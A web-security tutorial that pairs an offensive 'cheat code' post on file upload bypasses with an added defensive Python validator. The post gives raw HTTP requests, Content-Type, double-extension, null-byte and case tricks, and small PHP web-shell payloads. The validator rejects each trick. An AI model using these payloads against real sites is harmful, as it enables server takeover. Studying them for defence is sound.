Cheat code for file upload vulnerability by kidnapshadow

 

File Upload vulnerability

Introduction

An arbitrary file upload vulnerability is a type of security flaw that allows an attacker to upload malicious files onto a server.

Where to find

In any file upload feature, for example a photo, PDF, or document upload.

How to exploit

Follow these steps to find a file upload vulnerability.

Step 1: Find any file upload page on the web application.

Step 2: Upload a file directly.

Step 3: When you upload a file, the application only accepts image files.

Step 4: Upload a file in PHP format, then in Burp Suite change the extension to .jpeg, or to file.php.jpeg.

POST /images/upload/ HTTP/1.1
Host: target.com

Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpeg"
Content-Type: application/x-php

Step 5: Open a terminal and set up a listener to catch the request, and boom, you've got a shell.

1. Change the Content-Type value.

POST /images/upload/ HTTP/1.1
Host: target.com

Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php

Change the Content-Type:

POST /images/upload/ HTTP/1.1
Host: target.com

Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/jpeg

2. Try to change the extension when sending the request. For example, here you can't upload a file with the .php extension, but you can upload a .jpg file:

POST /images/upload/ HTTP/1.1
Host: target.com
Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
Content-Type: application/x-php
---------------------------829348923824

Change the request to this:

POST /images/upload/ HTTP/1.1
Host: target.com
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php

3. Upload the payload, but start it with GIF89a; as in:

POST /images/upload/ HTTP/1.1
Host: target.com
...
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/gif

GIF89a; <?php system("id") ?>

And don't forget to change the Content-Type to image/gif.

4. Bypass content length validation; it can be bypassed using a small payload:

(<?=`$_GET[x]`?>)

5. Use a null byte in the filename:

file.php%00.gif

6. Use double extensions for the uploaded file:

file.jpg.php1

7. Upload an unpopular PHP extension (php4, php5, php6, phtml):

file.php5

8. Try randomly capitalizing the file extension:

file.pHP5
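The flip side of the steps and bypass list above is what a server-side check has to get right to stop them. The following is an added example, not code from the original post: a small Python validator that parses one multipart part shaped like the requests shown above and rejects each of the tricks listed (wrong Content-Type, .php.jpeg and .jpg.php1 double extensions, the %00 null byte, php5-style extensions, and mixed-case extensions). The allowlist, the sample part, and the helper names (parse_multipart_part, validate_upload, check_part) are assumptions made for this example; a real application would use its framework's multipart parser and list only the types it needs.

```python
import re
import secrets

# Constructed allowlist for this example: extension -> (expected MIME type, magic bytes).
ALLOWED_TYPES = {
    "jpg": ("image/jpeg", b"\xff\xd8\xff"),
    "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "png": ("image/png", b"\x89PNG\r\n\x1a\n"),
    "gif": ("image/gif", b"GIF8"),  # GIF87a and GIF89a both start this way
}
MAX_SIZE = 5 * 1024 * 1024  # resource limit only; a tiny payload passes it, so it is not a security filter

# Constructed sample: one multipart part shaped like the request in the post above.
SAMPLE_PART = (
    b'Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpeg"\r\n'
    b"Content-Type: application/x-php\r\n"
    b"\r\n"
    b'<?php system("id"); ?>'
)


def parse_multipart_part(raw: bytes):
    """Split one multipart/form-data part into (filename, declared content type, body).
    Hypothetical helper for this example; a real server uses its framework's parser."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n"):
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    disposition = headers.get(b"content-disposition", b"").decode("latin-1")
    match = re.search(r'filename="([^"]*)"', disposition)
    filename = match.group(1) if match else ""
    ctype = headers.get(b"content-type", b"").decode("latin-1").lower()
    return filename, ctype, body


def validate_upload(filename: str, declared_type: str, data: bytes):
    """Return (accepted, reason, stored_name). Nothing the client sends is trusted:
    the name is checked, the bytes are checked, and the file is stored under a new name."""
    # Null bytes, raw or percent-encoded, and other control characters are rejected outright.
    if "\x00" in filename or "%00" in filename.lower() or any(ord(c) < 32 for c in filename):
        return False, "null byte or control character in filename", None
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]  # drop any client-supplied path
    segments = base.split(".")
    if len(segments) < 2 or not segments[0]:
        return False, "missing extension", None
    # Every extension after the first dot must be on the allowlist, compared case-insensitively.
    # This rejects dapos.php.jpeg, file.jpg.php1, file.php5 and file.pHP5 alike.
    exts = [s.lower() for s in segments[1:]]
    bad = [e for e in exts if e not in ALLOWED_TYPES]
    if bad:
        return False, "extension not allowed: ." + ".".join(bad), None
    ext = exts[-1]
    expected_mime, magic = ALLOWED_TYPES[ext]
    # The declared Content-Type is attacker-controlled; it may only confirm, never prove, the type.
    if declared_type.split(";")[0].strip().lower() != expected_mime:
        return False, f"content type {declared_type!r} does not match .{ext}", None
    if not data or len(data) > MAX_SIZE:
        return False, "empty or oversized file", None
    # Magic bytes are necessary but not sufficient: a polyglot like 'GIF89a; <?php ...'
    # still passes this check, so storage must also prevent execution (see note below).
    if not data.startswith(magic):
        return False, "content does not match declared image type", None
    stored = secrets.token_hex(16) + "." + ext  # the client-chosen name is never used on disk
    return True, "ok", stored


def check_part(raw: bytes):
    """Parse a raw multipart part and validate it; returns (accepted, reason, stored_name)."""
    return validate_upload(*parse_multipart_part(raw))


if __name__ == "__main__":
    # Each case is one of the bypasses listed in the post, plus a legitimate JPEG
    # and a GIF polyglot that the byte check alone cannot catch.
    cases = [
        ("dapos.php.jpeg", "application/x-php", b'<?php system("id"); ?>'),
        ("dapos.php", "image/gif", b'GIF89a; <?php system("id") ?>'),
        ("file.php%00.gif", "image/gif", b"GIF89a"),
        ("file.jpg.php1", "image/jpeg", b"\xff\xd8\xff"),
        ("file.pHP5", "image/jpeg", b"\xff\xd8\xff"),
        ("photo.JPG", "image/jpeg", b"\xff\xd8\xff\xe0" + bytes(16)),
        ("cat.gif", "image/gif", b'GIF89a; <?php system("id") ?>'),
    ]
    for name, ctype, body in cases:
        print(name, "->", validate_upload(name, ctype, body)[:2])
    print("sample part ->", check_part(SAMPLE_PART)[:2])
```

Two design points matter more than any single check. First, the name written to disk is random and carries only an allowlisted extension, so mod_mime-style multi-extension handling and case tricks have nothing to work with. Second, the cat.gif case is accepted: a GIF89a polyglot is a valid-looking image, and no header check will tell it apart, so the upload directory must be served with script execution disabled (or from outside the web root), and images are best re-encoded through an image library before storage so embedded text does not survive. The rejection reasons are worth logging as-is; a burst of "extension not allowed" and "content type does not match" entries from one client is the upload-bypass attempt described in this post, seen from the other side.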